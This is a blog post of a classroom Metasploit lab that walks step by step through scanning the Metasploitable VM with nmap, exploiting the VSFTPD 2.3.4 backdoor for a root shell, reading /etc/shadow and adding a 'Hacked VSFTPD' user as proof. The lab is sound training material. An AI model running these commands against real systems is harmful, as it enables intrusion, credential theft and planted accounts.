Thứ Ba, 19 tháng 11, 2013

Bài Thực Hành Metasploit Framework Lesson 2 : Exploiting VSFTPD 2.3.4



Section 0. Background Information
  1. Metasploitable 
  2. Pre-Requisite Lab
    • Metasploitable  : Lesson 1: Downloading and Configuring
     
  3. What is VSFTPD?
    • vsftpd, which stands for "Very Secure FTP Daemon",is an FTP server for Unix-like systems, including Linux. It is licensed under the GNU General Public License. It supports IPv6 and SSL.
    • In July 2011, it was discovered that vsftpd version 2.3.4 downloadable from the master site had been compromised.  Users logging into a compromised vsftpd-2.3.4 server may issue a ":)" smileyface as the username and gain a command shell on port 6200.  This was not an issue of a security hole in vsftpd, instead, someone had uploaded a different version of vsftpd which contained a backdoor. Since then, the site was moved to Google App Engine.
  4. exploit/unix/ftp/vsftpd_234_backdoor
    • This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available.
  5. Lab Notes
    • In this lab we will do the following:
      1. Run an intense NMAP Scan on the Metasploitable VM
      2. Search for VSFTPD
      3. Exploit the VSFTPD Daemon and obtain root.
  6. Legal Disclaimer - bài lab chỉ dùng trong môi trường lớp học

Section 1. Start Up the Metasploitable VM
  1. Start Up VMWare Player
    • Instructions:
      1. Click the Start Button
      2. Type Vmplayer in the search box
      3. Click on Vmplayer
  2. Open a Virtual Machine
    • Instructions:
      1. Click on Open a Virtual Machine
  3. Open the Metasploitable VM
    • Instructions:
      1. Navigate to where the Metasploitable VM is located
      2. Click on on the Metasploitable VM
      3. Click on the Open Button
  4. Edit the Metasploitable VM
    • Instructions:
      1. Select Metasploitable2-Linux VM
      2. Click Edit virtual machine settings
  5. Edit the Metasploitable VM
    • Instructions:
      1. Click on "Network Adapter NAT"
      2. Select the radio button "Bridged: Connected directly to the physical network"
      3. Click on the OK button
    • Warning:
      • By changing from NAT to Bridged opens the VM and network up to potential attacks.
      • To maintain a safe network, you could (1) skip this section and only use the host-only network, (2) unplug your router from the internet, (3) use an ACL to not allow traffic into your network, etc.
  6. Play the Metasploitable VM
    • Instructions:
      1. Click on the Metasploitable VM
      2. Click on Play virtual machine

Section 2. Determine Metasploitable IP Address
  1. Logging into Metasploitable
    • Instructions
      1. Username: msfadmin
      2. Password: msfadmin or whatever you changed it to in lesson 1.
  2. Determine Metasploitable IP Address
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      • This is the IP Address of the Victim Machine.
      • My IP Address is 192.168.1.109.
      • Record your IP Address.

Section 4. Start Up the BackTrack5R1 VM
  1. Start Up VMWare Player
    • Instructions:
      1. Click the Start Button
      2. Type Vmplayer in the search box
      3. Click on Vmplayer
  2. Open a Virtual Machine
    • Instructions:
      1. Click on Open a Virtual Machine
  3. Open the BackTrack5R1 VM
    • Instructions:
      1. Navigate to where the BackTrack5R1 VM is located
      2. Click on on the BackTrack5R1 VM
      3. Click on the Open Button
  4. Edit the BackTrack5R1 VM
    • Instructions:
      1. Select BackTrack5R1 VM
      2. Click Edit virtual machine settings
  5. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button
  6. Play the BackTrack5R1 VM
    • Instructions:
      1. Click on the BackTrack5R1 VM
      2. Click on Play virtual machine
  7. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.
  8. Bring up the GNOME
    • Instructions:
      1. Type startx
  9. Start up a terminal window
    • Instructions:
      1. Click on the Terminal Window
  10. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      • My IP address 192.168.1.111
      • In your case, it will probably be different.
      • This is the machine that will be use to attack the victim machine (Metasploitable).

Section 5. Scanning the Victim with NMAP
  1. Run Intense NMAP Scan on the Metasploitable VM
    • Note(FYI):
      • Replace 192.168.1.109 with the Metasploitable IP Address obtained from (Section 2, Step 2).
      • This intense NMAP scan could take 3 to 5 minutes to run.
    • Instructions:
      1. nmap -p 1-65535 -T4 -A -v 192.168.1.109 2>&1 | tee /var/tmp/scan.txt
  2. Looking for vsftp
    • Instructions:
      1. cd /var/tmp
      2. grep -i vsftp scan.txt
    • Note(FYI):
      • vsftpd runs on port 21.

Section 6. Exploit vsftpd 2.3.4
  1. Start the Metasploit Console
    • Instructions:
      1. msfconsole
  2. Use the VSFTPD v2.3.4 Backdoor Command Execution Exploit
    • Instructions:
      1. search vsftpd
      2. use exploit/unix/ftp/vsftpd_234_backdoor
  3. Set RHOST (Victim IP Address)
    • Instructions:
      1. show options
      2. set RHOST 192.168.1.109
    • Note(FYI):
      • Replace 192.168.1.109 with the Metasploitable IP Address obtained from (Section 2, Step 2).
  4. Exploit
    • Instructions:
      1. exploit
    • Note(FYI):
      • Now you should see a Command Shell Session opened between BackTrack to Metasploitable.
  5. Got Root?
    • Instructions:
      1. whoami
      2. hostname
      3. grep root /etc/shadow
    • Note(FYI):
      • Congratulations you now have root.
Section 7. Proof of Lab
  1. Proof of Lab
    • Instructions:
      1. whoami
      2. useradd -m -d /home/student3 -c "Hacked VSFTPD" -s /bin/bash student3
      3. grep student3 /etc/passwd
      4. date
      5. echo "Your Name"
        • Put in your actual name in place of "Your Name"
        • e.g., echo "John Gray"
    • Proof of Lab Instructions
      1. Press the <Ctrl> and <Alt> key at the same time.
      2. Press the <PrtScn> key.
      3. Paste into a word document
      4. Upload to website Www.AnToanThongTin.Edu.Vn

Không có nhận xét nào:

Đăng nhận xét